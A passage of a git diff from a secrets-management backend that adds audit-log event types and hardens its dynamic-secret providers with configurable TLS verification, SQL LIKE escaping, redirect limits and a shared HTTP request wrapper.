@@ -760,7 +798,8 @@ export const ACTOR_TYPE_TO_METADATA_ID_KEY: Partial> = [ActorType.ACME_PROFILE]: "profileId", [ActorType.ACME_ACCOUNT]: "accountId", [ActorType.EST_ACCOUNT]: "profileId", - [ActorType.SCEP_ACCOUNT]: "profileId" + [ActorType.SCEP_ACCOUNT]: "profileId", + [ActorType.GATEWAY]: "gatewayId" }; export const filterableSecretEvents: EventType[] = [ @@ -790,7 +829,7 @@ interface IdentityActorMetadata { identityId: string; name: string; permission?: Record; - + authMethod?: string; aws?: TAWSAuthDetails; kubernetes?: TKubernetesAuthDetails; oidc?: TOidcAuthDetails; @@ -824,6 +863,10 @@ interface ScepAccountActorMetadata { interface UnknownUserActorMetadata {} +interface GatewayActorMetadata { + gatewayId: string; +} + export interface UserActor { type: ActorType.USER; metadata: UserActorMetadata; @@ -877,6 +920,12 @@ export interface ScepAccountActor { type: ActorType.SCEP_ACCOUNT; metadata: ScepAccountActorMetadata; } + +export interface GatewayActor { + type: ActorType.GATEWAY; + metadata: GatewayActorMetadata; +} + export type Actor = | UserActor | ServiceActor @@ -887,7 +936,8 @@ export type Actor = | AcmeProfileActor | AcmeAccountActor | EstAccountActor - | ScepAccountActor; + | ScepAccountActor + | GatewayActor; interface GetSecretsEvent { type: EventType.GET_SECRETS; @@ -2249,6 +2299,9 @@ interface CreateWebhookEvent { environment: string; secretPath: string; isDisabled: boolean; + eventsFilter?: { + eventName: string; + }[]; }; } @@ -2259,6 +2312,9 @@ interface UpdateWebhookStatusEvent { environment: string; secretPath: string; isDisabled: boolean; + eventsFilter?: { + eventName: string; + }[]; }; } @@ -3013,6 +3069,36 @@ interface DeletePkiCollectionItem { }; } +interface CreateCertificateInventoryView { + type: EventType.CREATE_CERTIFICATE_INVENTORY_VIEW; + metadata: { + viewId: string; + name: string; + filters?: Record; + columns?: string[]; + isShared?: boolean; + }; +} + +interface UpdateCertificateInventoryView { + type: 
EventType.UPDATE_CERTIFICATE_INVENTORY_VIEW; + metadata: { + viewId: string; + name?: string; + filters?: Record; + columns?: string[]; + isShared?: boolean; + }; +} + +interface DeleteCertificateInventoryView { + type: EventType.DELETE_CERTIFICATE_INVENTORY_VIEW; + metadata: { + viewId: string; + name: string; + }; +} + interface CreatePkiSubscriber { type: EventType.CREATE_PKI_SUBSCRIBER; metadata: { @@ -3589,6 +3675,13 @@ interface CmekGetPrivateKeyEvent { }; } +interface CmekBulkGetPrivateKeysEvent { + type: EventType.CMEK_BULK_EXPORT_PRIVATE_KEYS; + metadata: { + keys: { keyId: string; name: string }[]; + }; +} + interface GetExternalGroupOrgRoleMappingsEvent { type: EventType.GET_EXTERNAL_GROUP_ORG_ROLE_MAPPINGS; metadata?: Record; // not needed, based off orgId @@ -4288,6 +4381,18 @@ interface DeleteSecretRotationEvent { metadata: TDeleteSecretRotationV2DTO; } +interface MoveSecretRotationEvent { + type: EventType.MOVE_SECRET_ROTATION; + metadata: { + type: string; + rotationId: string; + sourceEnvironment: string; + sourceSecretPath: string; + destinationEnvironment: string; + destinationSecretPath: string; + }; +} + interface RotateSecretRotationEvent { type: EventType.SECRET_ROTATION_ROTATE_SECRETS; metadata: Pick & { @@ -4653,6 +4758,45 @@ interface DashboardGetSecretVersionValueEvent { }; } +interface ViewSecretManagementInsightsCalendarEvent { + type: EventType.VIEW_INSIGHTS_SECRETS_MANAGEMENT_CALENDAR; + metadata: { + projectId: string; + month: number; + year: number; + }; +} + +interface ViewSecretManagementInsightsAccessVolumeEvent { + type: EventType.VIEW_INSIGHTS_SECRETS_MANAGEMENT_ACCESS_VOLUME; + metadata: { + projectId: string; + }; +} + +interface ViewSecretManagementInsightsAccessLocationsEvent { + type: EventType.VIEW_INSIGHTS_SECRETS_MANAGEMENT_ACCESS_LOCATIONS; + metadata: { + projectId: string; + days: number; + }; +} + +interface ViewInsightsAuthMethodsEvent { + type: EventType.VIEW_INSIGHTS_AUTH_METHODS; + metadata: { + projectId: 
string; + days: number; + }; +} + +interface ViewSecretManagementInsightsSummaryEvent { + type: EventType.VIEW_INSIGHTS_SECRETS_MANAGEMENT_SUMMARY; + metadata: { + projectId: string; + }; +} + interface ProjectRoleCreateEvent { type: EventType.CREATE_PROJECT_ROLE; metadata: { @@ -4825,6 +4969,7 @@ interface PamAccountAccessEvent { resourceName: string; accountName: string; duration?: string; + reason?: string; }; } @@ -4837,11 +4982,22 @@ interface PamWebAccessSessionTicketCreatedEvent { }; } +interface PamAccountAwsConsoleUrlGeneratedEvent { + type: EventType.PAM_ACCOUNT_AWS_CONSOLE_URL_GENERATED; + metadata: { + sessionId: string; + accountId: string; + resourceName: string; + accountName: string; + }; +} + interface PamAccountCreateEvent { type: EventType.PAM_ACCOUNT_CREATE; metadata: { - resourceId: string; - resourceType: string; + resourceId?: string | null; + domainId?: string | null; + parentType: PamParentType; folderId?: string | null; name: string; description?: string | null; @@ -4853,8 +5009,9 @@ interface PamAccountUpdateEvent { type: EventType.PAM_ACCOUNT_UPDATE; metadata: { accountId: string; - resourceId: string; - resourceType: string; + resourceId?: string | null; + domainId?: string | null; + parentType: PamParentType; name?: string; description?: string | null; requireMfa?: boolean | null; @@ -4866,8 +5023,9 @@ interface PamAccountDeleteEvent { metadata: { accountName: string; accountId: string; - resourceId: string; - resourceType: string; + resourceId?: string | null; + domainId?: string | null; + parentType: PamParentType; }; } @@ -4940,8 +5098,10 @@ interface PamAccountReadCredentialsEvent { metadata: { accountId: string; accountName: string; - resourceId: string; - resourceType: string; + resourceId?: string | null; + resourceType?: string | null; + domainId?: string | null; + domainType?: string | null; }; } @@ -4988,6 +5148,49 @@ interface PamResourceDeleteEvent { }; } +interface PamDomainListEvent { + type: EventType.PAM_DOMAIN_LIST; + 
metadata: { + count: number; + }; +} + +interface PamDomainGetEvent { + type: EventType.PAM_DOMAIN_GET; + metadata: { + domainId: string; + domainType: string; + name: string; + }; +} + +interface PamDomainCreateEvent { + type: EventType.PAM_DOMAIN_CREATE; + metadata: { + domainType: string; + gatewayId?: string; + name: string; + }; +} + +interface PamDomainUpdateEvent { + type: EventType.PAM_DOMAIN_UPDATE; + metadata: { + domainId: string; + domainType: string; + gatewayId?: string; + name?: string; + }; +} + +interface PamDomainDeleteEvent { + type: EventType.PAM_DOMAIN_DELETE; + metadata: { + domainId: string; + domainType: string; + }; +} + interface PamDiscoverySourceListEvent { type: EventType.PAM_DISCOVERY_SOURCE_LIST; metadata: { @@ -5208,6 +5411,15 @@ interface GetCertificateFromRequestEvent { }; } +interface TriggerCertificateRequestValidationEvent { + type: EventType.TRIGGER_CERTIFICATE_REQUEST_VALIDATION; + metadata: { + certificateRequestId: string; + status: string; + orderStatus?: string; + }; +} + interface ListCertificateRequestsEvent { type: EventType.LIST_CERTIFICATE_REQUESTS; metadata: { @@ -5805,7 +6017,7 @@ interface ScepEnrollmentEvent { profileSlug: string; transactionId: string; csrSubject: string; - challengeType: "static"; + challengeType: ScepChallengeType; status: "success" | "pending" | "failure"; failReason?: string; issuedCertificateId?: string; @@ -5830,6 +6042,15 @@ interface ScepRenewalEvent { }; } +interface ScepDynamicChallengeGeneratedEvent { + type: EventType.SCEP_DYNAMIC_CHALLENGE_GENERATED; + metadata: { + profileId: string; + profileSlug: string; + expiresAt: string; + }; +} + interface SecretValidationRuleCreateEvent { type: EventType.SECRET_VALIDATION_RULE_CREATE; metadata: { @@ -5861,6 +6082,31 @@ interface SecretValidationRuleDeleteEvent { }; } +interface ExternalMigrationCreateEvent { + type: EventType.EXTERNAL_MIGRATION_CREATE; + metadata: { + configId: string; + provider: string; + connectionId: string | null; + }; 
+} + +interface ExternalMigrationUpdateEvent { + type: EventType.EXTERNAL_MIGRATION_UPDATE; + metadata: { + configId: string; + provider: string; + connectionId: string | null; + }; +} + +interface ExternalMigrationDeleteEvent { + type: EventType.EXTERNAL_MIGRATION_DELETE; + metadata: { + configId: string; + provider: string; + }; +} interface CreateEmailDomainEvent { type: EventType.CREATE_EMAIL_DOMAIN; metadata: { @@ -5885,6 +6131,74 @@ interface DeleteEmailDomainEvent { }; } +interface GatewayCreateEvent { + type: EventType.GATEWAY_CREATE; + metadata: { + gatewayId: string; + name: string; + }; +} + +interface GatewayEnrollmentTokenCreateEvent { + type: EventType.GATEWAY_ENROLLMENT_TOKEN_CREATE; + metadata: { + tokenId: string; + name: string; + }; +} + +interface GatewayEnrollEvent { + type: EventType.GATEWAY_ENROLL; + metadata: { + gatewayId: string; + name: string; + }; +} + +interface GatewayPoolCreateEvent { + type: EventType.GATEWAY_POOL_CREATE; + metadata: { + poolId: string; + name: string; + }; +} + +interface GatewayPoolUpdateEvent { + type: EventType.GATEWAY_POOL_UPDATE; + metadata: { + poolId: string; + name: string; + }; +} + +interface GatewayPoolDeleteEvent { + type: EventType.GATEWAY_POOL_DELETE; + metadata: { + poolId: string; + name: string; + }; +} + +interface GatewayPoolAddMemberEvent { + type: EventType.GATEWAY_POOL_ADD_MEMBER; + metadata: { + poolId: string; + poolName: string; + gatewayId: string; + gatewayName: string; + }; +} + +interface GatewayPoolRemoveMemberEvent { + type: EventType.GATEWAY_POOL_REMOVE_MEMBER; + metadata: { + poolId: string; + poolName: string; + gatewayId: string; + gatewayName: string; + }; +} + export type Event = | CreateSubOrganizationEvent | UpdateSubOrganizationEvent @@ -6095,6 +6409,9 @@ export type Event = | GetPkiCollectionItems | AddPkiCollectionItem | DeletePkiCollectionItem + | CreateCertificateInventoryView + | UpdateCertificateInventoryView + | DeleteCertificateInventoryView | CreatePkiSubscriber | 
UpdatePkiSubscriber | DeletePkiSubscriber @@ -6154,6 +6471,7 @@ export type Event = | CmekListSigningAlgorithmsEvent | CmekGetPublicKeyEvent | CmekGetPrivateKeyEvent + | CmekBulkGetPrivateKeysEvent | GetExternalGroupOrgRoleMappingsEvent | UpdateExternalGroupOrgRoleMappingsEvent | GetProjectTemplatesEvent @@ -6247,6 +6565,7 @@ export type Event = | CreateSecretRotationEvent | UpdateSecretRotationEvent | DeleteSecretRotationEvent + | MoveSecretRotationEvent | RotateSecretRotationEvent | ReconcileSecretRotationEvent | MicrosoftTeamsWorkflowIntegrationCreateEvent @@ -6287,6 +6606,11 @@ export type Event = | DashboardListSecretsEvent | DashboardGetSecretValueEvent | DashboardGetSecretVersionValueEvent + | ViewSecretManagementInsightsCalendarEvent + | ViewSecretManagementInsightsAccessVolumeEvent + | ViewSecretManagementInsightsAccessLocationsEvent + | ViewInsightsAuthMethodsEvent + | ViewSecretManagementInsightsSummaryEvent | ProjectRoleCreateEvent | ProjectRoleUpdateEvent | ProjectRoleDeleteEvent @@ -6307,6 +6631,7 @@ export type Event = | PamAccountListEvent | PamAccountGetEvent | PamAccountAccessEvent + | PamAccountAwsConsoleUrlGeneratedEvent | PamWebAccessSessionTicketCreatedEvent | PamAccountCreateEvent | PamAccountUpdateEvent @@ -6324,6 +6649,11 @@ export type Event = | PamResourceCreateEvent | PamResourceUpdateEvent | PamResourceDeleteEvent + | PamDomainListEvent + | PamDomainGetEvent + | PamDomainCreateEvent + | PamDomainUpdateEvent + | PamDomainDeleteEvent | PamDiscoverySourceListEvent | PamDiscoverySourceGetEvent | PamDiscoverySourceCreateEvent @@ -6346,6 +6676,7 @@ export type Event = | GetCertificateRequestEvent | GetCertificateFromRequestEvent | ListCertificateRequestsEvent + | TriggerCertificateRequestValidationEvent | AutomatedRenewCertificate | AutomatedRenewCertificateFailed | UserLoginEvent @@ -6413,9 +6744,21 @@ export type Event = | CertificateCleanupCompletedEvent | ScepEnrollmentEvent | ScepRenewalEvent + | ScepDynamicChallengeGeneratedEvent | 
SecretValidationRuleCreateEvent | SecretValidationRuleUpdateEvent | SecretValidationRuleDeleteEvent + | ExternalMigrationCreateEvent + | ExternalMigrationUpdateEvent + | ExternalMigrationDeleteEvent | CreateEmailDomainEvent | VerifyEmailDomainEvent - | DeleteEmailDomainEvent; + | DeleteEmailDomainEvent + | GatewayCreateEvent + | GatewayEnrollmentTokenCreateEvent + | GatewayEnrollEvent + | GatewayPoolCreateEvent + | GatewayPoolUpdateEvent + | GatewayPoolDeleteEvent + | GatewayPoolAddMemberEvent + | GatewayPoolRemoveMemberEvent; diff --git a/backend/src/ee/services/dynamic-secret-lease/dynamic-secret-lease-queue.ts b/backend/src/ee/services/dynamic-secret-lease/dynamic-secret-lease-queue.ts index 688db03690d..52f6b03232a 100644 --- a/backend/src/ee/services/dynamic-secret-lease/dynamic-secret-lease-queue.ts +++ b/backend/src/ee/services/dynamic-secret-lease/dynamic-secret-lease-queue.ts @@ -1,8 +1,7 @@ import { ProjectMembershipRole } from "@app/db/schemas"; -import { DisableRotationErrors } from "@app/ee/services/secret-rotation/secret-rotation-queue"; import { getConfig } from "@app/lib/config/env"; import { applyJitter } from "@app/lib/delay"; -import { NotFoundError } from "@app/lib/errors"; +import { DisableRotationErrors, NotFoundError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; import { QueueJobs, QueueName, TQueueServiceFactory } from "@app/queue"; import { TIdentityDALFactory } from "@app/services/identity/identity-dal"; diff --git a/backend/src/ee/services/dynamic-secret/dynamic-secret-dal.ts b/backend/src/ee/services/dynamic-secret/dynamic-secret-dal.ts index 7dcc6836e8d..482bb851949 100644 --- a/backend/src/ee/services/dynamic-secret/dynamic-secret-dal.ts +++ b/backend/src/ee/services/dynamic-secret/dynamic-secret-dal.ts @@ -3,6 +3,7 @@ import { Knex } from "knex"; import { TDbClient } from "@app/db"; import { TableName, TDynamicSecrets } from "@app/db/schemas"; import { DatabaseError } from "@app/lib/errors"; +import { 
sanitizeSqlLikeString } from "@app/lib/fn"; import { buildFindFilter, ormify, @@ -142,7 +143,7 @@ export const dynamicSecretDALFactory = (db: TDbClient): TDynamicSecretDALFactory .whereIn("folderId", folderIds) .where((bd) => { if (search) { - void bd.whereILike(`${TableName.DynamicSecret}.name`, `%${search}%`); + void bd.whereILike(`${TableName.DynamicSecret}.name`, `%${sanitizeSqlLikeString(search)}%`); } }) .leftJoin( diff --git a/backend/src/ee/services/dynamic-secret/dynamic-secret-fns.ts b/backend/src/ee/services/dynamic-secret/dynamic-secret-fns.ts index af1f422de20..8a440c1aeb1 100644 --- a/backend/src/ee/services/dynamic-secret/dynamic-secret-fns.ts +++ b/backend/src/ee/services/dynamic-secret/dynamic-secret-fns.ts @@ -24,6 +24,7 @@ export const verifyHostInputValidity = async ({ const reservedHosts = [appCfg.DB_HOST || getDbConnectionHost(appCfg.DB_CONNECTION_URI)].concat( (appCfg.DB_READ_REPLICAS || []).map((el) => getDbConnectionHost(el.DB_CONNECTION_URI)), getDbConnectionHost(appCfg.REDIS_URL), + getDbConnectionHost(appCfg.CLICKHOUSE_URL), getDbConnectionHost(appCfg.AUDIT_LOGS_DB_CONNECTION_URI) ); @@ -31,26 +32,18 @@ export const verifyHostInputValidity = async ({ const exclusiveIps: string[] = []; for await (const el of reservedHosts) { if (el) { - if (net.isIPv4(el)) { + if (net.isIP(el)) { exclusiveIps.push(el); } else { - try { - const resolvedIps = await dns.resolve4(el); - exclusiveIps.push(...resolvedIps); - } catch (error) { - // only try lookup if not found - if ((error as { code: string })?.code !== "ENOTFOUND") throw error; - - const resolvedIps = (await dns.lookup(el, { all: true, family: 4 })).map(({ address }) => address); - exclusiveIps.push(...resolvedIps); - } + const resolvedIps = (await dns.lookup(el, { all: true })).map(({ address }) => address); + exclusiveIps.push(...resolvedIps); } } } const normalizedHost = host.split(":")[0].toLowerCase(); const inputHostIps: string[] = []; - if (net.isIPv4(host)) { + if (net.isIP(host)) { 
inputHostIps.push(host); } else { if (!appCfg.DYNAMIC_SECRET_ALLOW_INTERNAL_IP && !appCfg.ALLOW_INTERNAL_IP_CONNECTIONS) { @@ -60,16 +53,8 @@ export const verifyHostInputValidity = async ({ }); } } - try { - const resolvedIps = await dns.resolve4(host); - inputHostIps.push(...resolvedIps); - } catch (error) { - // only try lookup if not found - if ((error as { code: string })?.code !== "ENOTFOUND") throw error; - - const resolvedIps = (await dns.lookup(host, { all: true, family: 4 })).map(({ address }) => address); - inputHostIps.push(...resolvedIps); - } + const resolvedIps = (await dns.lookup(host, { all: true })).map(({ address }) => address); + inputHostIps.push(...resolvedIps); } if (!(appCfg.DYNAMIC_SECRET_ALLOW_INTERNAL_IP || appCfg.ALLOW_INTERNAL_IP_CONNECTIONS)) { diff --git a/backend/src/ee/services/dynamic-secret/dynamic-secret-service.ts b/backend/src/ee/services/dynamic-secret/dynamic-secret-service.ts index b5c82fd624d..b0165ae7cbd 100644 --- a/backend/src/ee/services/dynamic-secret/dynamic-secret-service.ts +++ b/backend/src/ee/services/dynamic-secret/dynamic-secret-service.ts @@ -616,7 +616,7 @@ export const dynamicSecretServiceFactory = ({ } const dynamicSecretCfg = await dynamicSecretDAL.find( - { $in: { folderId: folders.map((folder) => folder.id) }, $search: search ? { name: `%${search}%` } : undefined }, + { $in: { folderId: folders.map((folder) => folder.id) }, $search: search ? { name: search } : undefined }, { countDistinct: "name" } ); @@ -653,7 +653,7 @@ export const dynamicSecretServiceFactory = ({ } const dynamicSecretCfg = await dynamicSecretDAL.find( - { folderId: folder.id, $search: search ? { name: `%${search}%` } : undefined }, + { folderId: folder.id, $search: search ? { name: search } : undefined }, { count: true } ); return Number(dynamicSecretCfg[0]?.count ?? 
0); @@ -697,7 +697,7 @@ export const dynamicSecretServiceFactory = ({ throw new NotFoundError({ message: `Folder with path '${path}' in environment '${environmentSlug}' not found` }); const dynamicSecretCfg = await dynamicSecretDAL.findWithMetadata( - { folderId: folder.id, $search: search ? { name: `%${search}%` } : undefined }, + { folderId: folder.id, $search: search ? { name: search } : undefined }, { limit, offset, diff --git a/backend/src/ee/services/dynamic-secret/providers/aws-elasticache.ts b/backend/src/ee/services/dynamic-secret/providers/aws-elasticache.ts index 0ce83a49afe..6cf5c9c9fdd 100644 --- a/backend/src/ee/services/dynamic-secret/providers/aws-elasticache.ts +++ b/backend/src/ee/services/dynamic-secret/providers/aws-elasticache.ts @@ -255,7 +255,9 @@ export const AwsElastiCacheDatabaseProvider = (): TDynamicProviderFns => { const revoke = async (inputs: unknown, entityId: string) => { const providerInputs = await validateProviderInputs(inputs); - const revokeStatement = handlebars.compile(providerInputs.revocationStatement)({ username: entityId }); + const revokeStatement = handlebars.compile(providerInputs.revocationStatement, { noEscape: true })({ + username: entityId + }); const parsedStatement = DeleteElasticCacheUserSchema.parse(JSON.parse(revokeStatement)); try { diff --git a/backend/src/ee/services/dynamic-secret/providers/azure-entra-id.ts b/backend/src/ee/services/dynamic-secret/providers/azure-entra-id.ts index 98386c4d37d..cc72f268b36 100644 --- a/backend/src/ee/services/dynamic-secret/providers/azure-entra-id.ts +++ b/backend/src/ee/services/dynamic-secret/providers/azure-entra-id.ts @@ -1,6 +1,6 @@ -import axios from "axios"; import { customAlphabet } from "nanoid"; +import { request } from "@app/lib/config/request"; import { BadRequestError } from "@app/lib/errors"; import { sanitizeString } from "@app/lib/fn"; @@ -29,7 +29,7 @@ export const AzureEntraIDProvider = (): TDynamicProviderFns & { applicationId: string, clientSecret: 
string ): Promise<{ token?: string; success: boolean }> => { - const response = await axios.post<{ access_token: string }>( + const response = await request.post<{ access_token: string }>( `${MSFT_LOGIN_URL}/${tenantId}/oauth2/v2.0/token`, { grant_type: "client_credentials", @@ -76,7 +76,7 @@ export const AzureEntraIDProvider = (): TDynamicProviderFns & { throw new BadRequestError({ message: "Failed to authorize to Microsoft Entra ID" }); } - const response = await axios.patch( + const response = await request.patch( `${MSFT_GRAPH_API_URL}/users/${providerInputs.userId}`, { passwordProfile: { @@ -136,7 +136,7 @@ export const AzureEntraIDProvider = (): TDynamicProviderFns & { throw new BadRequestError({ message: "Failed to authorize to Microsoft Entra ID" }); } - const response = await axios.get<{ value: [{ id: string; displayName: string; userPrincipalName: string }] }>( + const response = await request.get<{ value: [{ id: string; displayName: string; userPrincipalName: string }] }>( `${MSFT_GRAPH_API_URL}/users`, { headers: { diff --git a/backend/src/ee/services/dynamic-secret/providers/azure-sql-database.ts b/backend/src/ee/services/dynamic-secret/providers/azure-sql-database.ts index 8b1580cac5d..00c77013bf8 100644 --- a/backend/src/ee/services/dynamic-secret/providers/azure-sql-database.ts +++ b/backend/src/ee/services/dynamic-secret/providers/azure-sql-database.ts @@ -145,7 +145,11 @@ export const AzureSqlDatabaseProvider = ({ targetDatabase?: string ) => { const ssl = providerInputs.ca - ? { rejectUnauthorized: false, ca: providerInputs.ca, servername: providerInputs.host } + ? { + rejectUnauthorized: providerInputs.sslRejectUnauthorized, + ca: providerInputs.ca, + servername: providerInputs.originalHost + } : undefined; /* @@ -177,7 +181,7 @@ export const AzureSqlDatabaseProvider = ({ // https://github.com/tediousjs/tedious/blob/ebb023ed90969a7ec0e4b036533ad52739d921f7/test/config.ci.ts#L19 options: { ...(providerInputs.sslEnabled !== undefined ? 
{ encrypt: providerInputs.sslEnabled } : {}), - trustServerCertificate: !providerInputs.ca, + trustServerCertificate: !providerInputs.sslRejectUnauthorized, cryptoCredentialsDetails: providerInputs.ca ? { ca: providerInputs.ca } : {} } }, @@ -367,7 +371,10 @@ export const AzureSqlDatabaseProvider = ({ const { database, masterDatabase } = providerInputs; const gatewayCallback = async (host = providerInputs.host, port = providerInputs.port) => { - const revokeStatement = handlebars.compile(providerInputs.revocationStatement)({ username, database }); + const revokeStatement = handlebars.compile(providerInputs.revocationStatement, { noEscape: true })({ + username, + database + }); const queries = revokeStatement.toString().split(";").filter(Boolean); const userDropQueries = queries.filter((query) => query.toLowerCase().includes("drop user")); @@ -487,7 +494,7 @@ export const AzureSqlDatabaseProvider = ({ const expiration = new Date(expireAt).toISOString(); const { database } = providerInputs; - const renewStatement = handlebars.compile(providerInputs.renewStatement)({ + const renewStatement = handlebars.compile(providerInputs.renewStatement, { noEscape: true })({ username: entityId, expiration, database diff --git a/backend/src/ee/services/dynamic-secret/providers/cassandra.ts b/backend/src/ee/services/dynamic-secret/providers/cassandra.ts index 1b3413141a4..79160924b76 100644 --- a/backend/src/ee/services/dynamic-secret/providers/cassandra.ts +++ b/backend/src/ee/services/dynamic-secret/providers/cassandra.ts @@ -43,7 +43,9 @@ export const CassandraProvider = (): TDynamicProviderFns => { }; const $getClient = async (providerInputs: z.infer) => { - const sslOptions = providerInputs.ca ? { rejectUnauthorized: false, ca: providerInputs.ca } : undefined; + const sslOptions = providerInputs.ca + ? 
{ rejectUnauthorized: providerInputs.sslRejectUnauthorized, ca: providerInputs.ca } + : undefined; const client = new cassandra.Client({ sslOptions, protocolOptions: { @@ -146,7 +148,10 @@ export const CassandraProvider = (): TDynamicProviderFns => { const { keyspace } = providerInputs; try { - const revokeStatement = handlebars.compile(providerInputs.revocationStatement)({ username, keyspace }); + const revokeStatement = handlebars.compile(providerInputs.revocationStatement, { noEscape: true })({ + username, + keyspace + }); const queries = revokeStatement.toString().split(";").filter(Boolean); for (const query of queries) { // eslint-disable-next-line @@ -180,7 +185,7 @@ export const CassandraProvider = (): TDynamicProviderFns => { try { const expiration = new Date(expireAt).toISOString(); - const renewStatement = handlebars.compile(providerInputs.renewStatement)({ + const renewStatement = handlebars.compile(providerInputs.renewStatement, { noEscape: true })({ username: entityId, keyspace, expiration diff --git a/backend/src/ee/services/dynamic-secret/providers/couchbase.ts b/backend/src/ee/services/dynamic-secret/providers/couchbase.ts index 090eb549b20..06ed1c38e93 100644 --- a/backend/src/ee/services/dynamic-secret/providers/couchbase.ts +++ b/backend/src/ee/services/dynamic-secret/providers/couchbase.ts @@ -1,9 +1,9 @@ import crypto from "node:crypto"; -import axios from "axios"; import RE2 from "re2"; import { TDynamicSecrets } from "@app/db/schemas"; +import { request } from "@app/lib/config/request"; import { BadRequestError } from "@app/lib/errors"; import { sanitizeString } from "@app/lib/fn"; import { alphaNumericNanoId } from "@app/lib/nanoid"; @@ -159,7 +159,7 @@ const couchbaseApiRequest = async ( await blockLocalAndPrivateIpAddresses(url); try { - const response = await axios({ + const response = await request({ method: method.toLowerCase() as "get" | "post" | "put" | "delete", url, headers: { @@ -167,7 +167,8 @@ const couchbaseApiRequest = async ( 
"Content-Type": "application/json" }, data: data || undefined, - timeout: 30000 + timeout: 30000, + maxRedirects: 0 }); return response.data as CouchbaseUserResponse; diff --git a/backend/src/ee/services/dynamic-secret/providers/elastic-search.ts b/backend/src/ee/services/dynamic-secret/providers/elastic-search.ts index 85c85f43696..5aaf73f3d0d 100644 --- a/backend/src/ee/services/dynamic-secret/providers/elastic-search.ts +++ b/backend/src/ee/services/dynamic-secret/providers/elastic-search.ts @@ -30,7 +30,7 @@ export const ElasticSearchProvider = (): TDynamicProviderFns => { url: new URL(`${providerInputs.host}:${providerInputs.port}`), ...(providerInputs.ca && { ssl: { - rejectUnauthorized: false, + rejectUnauthorized: providerInputs.sslRejectUnauthorized, ca: providerInputs.ca } }) diff --git a/backend/src/ee/services/dynamic-secret/providers/github.ts b/backend/src/ee/services/dynamic-secret/providers/github.ts index d3259064ae8..408189f56ce 100644 --- a/backend/src/ee/services/dynamic-secret/providers/github.ts +++ b/backend/src/ee/services/dynamic-secret/providers/github.ts @@ -1,6 +1,7 @@ -import axios from "axios"; +import { isAxiosError } from "axios"; import jwt from "jsonwebtoken"; +import { request } from "@app/lib/config/request"; import { crypto } from "@app/lib/crypto"; import { BadRequestError, InternalServerError } from "@app/lib/errors"; import { sanitizeString } from "@app/lib/fn"; @@ -56,7 +57,7 @@ export const GithubProvider = (): TDynamicProviderFns => { const tokenUrl = `${IntegrationUrls.GITHUB_API_URL}/app/installations/${String(installationId)}/access_tokens`; try { - const response = await axios.post(tokenUrl, undefined, { + const response = await request.post(tokenUrl, undefined, { headers: { Authorization: `Bearer ${appJwt}`, Accept: "application/vnd.github.v3+json", @@ -73,7 +74,7 @@ export const GithubProvider = (): TDynamicProviderFns => { }); } catch (error) { let message = "Failed to fetch GitHub installation access token."; - if 
(axios.isAxiosError(error) && error.response) { + if (isAxiosError(error) && error.response) { const githubErrorMsg = (error.response.data as { message?: string })?.message || JSON.stringify(error.response.data); message += ` GitHub API Error: ${error.response.status} - ${githubErrorMsg}`; diff --git a/backend/src/ee/services/dynamic-secret/providers/kubernetes.ts b/backend/src/ee/services/dynamic-secret/providers/kubernetes.ts index a9b9cf1c276..5dac4914fc1 100644 --- a/backend/src/ee/services/dynamic-secret/providers/kubernetes.ts +++ b/backend/src/ee/services/dynamic-secret/providers/kubernetes.ts @@ -1,7 +1,8 @@ -import axios, { AxiosError } from "axios"; +import { AxiosError, isAxiosError } from "axios"; import https from "https"; import { TDynamicSecrets } from "@app/db/schemas"; +import { request } from "@app/lib/config/request"; import { BadRequestError } from "@app/lib/errors"; import { sanitizeString } from "@app/lib/fn"; import { GatewayHttpProxyActions, GatewayProxyProtocol, withGatewayProxy } from "@app/lib/gateway"; @@ -135,7 +136,7 @@ export const KubernetesProvider = ({ for await (const namespace of namespaces) { try { // 1. Create a test service account - await axios.post( + await request.post( `${baseUrl}/api/v1/namespaces/${namespace}/serviceaccounts`, { metadata: { @@ -171,7 +172,7 @@ export const KubernetesProvider = ({ ...(providerInputs.roleType !== KubernetesRoleType.ClusterRole && { namespace }) }; - await axios.post( + await request.post( roleBindingUrl, { metadata: roleBindingMetadata, @@ -206,7 +207,7 @@ export const KubernetesProvider = ({ ); // 3. Request a token for the test service account - await axios.post( + await request.post( `${baseUrl}/api/v1/namespaces/${namespace}/serviceaccounts/${serviceAccountName}/token`, { spec: { @@ -233,7 +234,7 @@ export const KubernetesProvider = ({ // 4. 
Cleanup: delete role binding and service account if (providerInputs.roleType === KubernetesRoleType.Role) { - await axios.delete( + await request.delete( `${baseUrl}/apis/rbac.authorization.k8s.io/v1/namespaces/${namespace}/rolebindings/${roleBindingName}`, { headers: { @@ -252,24 +253,27 @@ export const KubernetesProvider = ({ } ); } else { - await axios.delete(`${baseUrl}/apis/rbac.authorization.k8s.io/v1/clusterrolebindings/${roleBindingName}`, { - headers: { - "Content-Type": "application/json", - ...(providerInputs.authMethod === KubernetesAuthMethod.Gateway - ? { "x-infisical-action": GatewayHttpProxyActions.UseGatewayK8sServiceAccount } - : { Authorization: `Bearer ${providerInputs.clusterToken}` }) - }, - ...(providerInputs.authMethod === KubernetesAuthMethod.Api - ? { - httpsAgent - } - : {}), - signal: AbortSignal.timeout(EXTERNAL_REQUEST_TIMEOUT), - timeout: EXTERNAL_REQUEST_TIMEOUT - }); + await request.delete( + `${baseUrl}/apis/rbac.authorization.k8s.io/v1/clusterrolebindings/${roleBindingName}`, + { + headers: { + "Content-Type": "application/json", + ...(providerInputs.authMethod === KubernetesAuthMethod.Gateway + ? { "x-infisical-action": GatewayHttpProxyActions.UseGatewayK8sServiceAccount } + : { Authorization: `Bearer ${providerInputs.clusterToken}` }) + }, + ...(providerInputs.authMethod === KubernetesAuthMethod.Api + ? { + httpsAgent + } + : {}), + signal: AbortSignal.timeout(EXTERNAL_REQUEST_TIMEOUT), + timeout: EXTERNAL_REQUEST_TIMEOUT + } + ); } - await axios.delete(`${baseUrl}/api/v1/namespaces/${namespace}/serviceaccounts/${serviceAccountName}`, { + await request.delete(`${baseUrl}/api/v1/namespaces/${namespace}/serviceaccounts/${serviceAccountName}`, { headers: { "Content-Type": "application/json", ...(providerInputs.authMethod === KubernetesAuthMethod.Gateway @@ -305,7 +309,7 @@ export const KubernetesProvider = ({ const baseUrl = port ? 
